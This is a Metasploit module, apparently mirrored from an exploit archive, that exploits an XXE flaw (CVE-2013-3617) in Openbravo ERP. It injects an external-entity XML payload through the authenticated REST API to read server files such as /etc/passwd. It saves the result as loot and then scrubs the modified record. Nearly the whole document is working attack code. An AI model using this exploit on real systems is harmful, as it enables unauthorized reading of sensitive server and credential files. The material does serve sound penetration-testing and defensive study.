## https://sploitus.com/exploit?id=PACKETSTORM:180863
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/dns'
require 'rexml/document'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Openbravo ERP XXE Arbitrary File Read',
'Description' => %q{
The Openbravo ERP XML API expands external entities which can be defined as
local files. This allows the user to read any files from the FS as the
user Openbravo is running as (generally not root).
This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.
},
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
],
'References' => [
['CVE', '2013-3617'],
['OSVDB', '99141'],
['BID', '63431'],
['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-10-30'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'Base Openbravo directory path', '/openbravo/']),
OptString.new('HttpUsername', [true, 'The Openbravo user', 'Openbravo']),
OptString.new('HttpPassword', [true, 'The Openbravo password', 'openbravo']),
OptString.new('FILEPATH', [true, 'The filepath to read on the server', '/etc/passwd']),
OptString.new('ENDPOINT', [true, 'The XML API REST endpoint to use', 'ADUser'])
]
)
end
def run
print_status('Requesting list of entities from endpoint, this may take a minute...')
users = send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], "/ws/dal/#{datastore['ENDPOINT']}"),
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
}, 60)
if !users || (users.code != 200)
fail_with(Failure::NoAccess, 'Invalid response. Check your credentials and that the server is correct.')
end
xml = path = id = other_id = '' # for later use
doc = REXML::Document.new users.body
doc.root.elements.each do |user|
id = user.attributes['id']
other_id = user.attributes['identifier']
print_status("Found #{datastore['ENDPOINT']} #{other_id} with ID: #{id}")
print_status("Trying #{other_id}")
xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file://)
xml << "#{datastore['FILEPATH']}\" > ]>\n"
xml << '<ob:Openbravo xmlns:ob="http://www.openbravo.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
xml << "<#{datastore['ENDPOINT']} id=\"#{id}\" identifier=\"#{other_id}\">"
xml << "<id>#{id}</id>"
xml << '<comments>&xxe;</comments>'
xml << "</#{datastore['ENDPOINT']}>"
xml << '</ob:Openbravo>'
resp = send_request_raw({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, "/ws/dal/#{datastore['ENDPOINT']}/#{id}"),
'data' => xml,
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
})
if !resp || (resp.code != 200) || resp.body =~ (/Not updating entity/)
print_error("Problem updating #{datastore['ENDPOINT']} #{other_id} with ID: #{id}")
next
end
print_status("Found writable #{datastore['ENDPOINT']}: #{other_id}")
u = send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], "/ws/dal/#{datastore['ENDPOINT']}/#{id}"),
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
})
u = REXML::Document.new u.body
path = store_loot('openbravo.file', 'text/plain/', datastore['RHOST'], u.root.elements['//comments'].first.to_s, "File from Openbravo server #{datastore['RHOST']}")
break
end
if path != ''
print_status('Cleaning up after ourselves...')
xml.sub!('&xxe;', '')
send_request_raw({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, "/ws/dal/#{datastore['ENDPOINT']}/#{id}"),
'data' => xml,
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
})
print_good("File saved to: #{path}")
end
end
end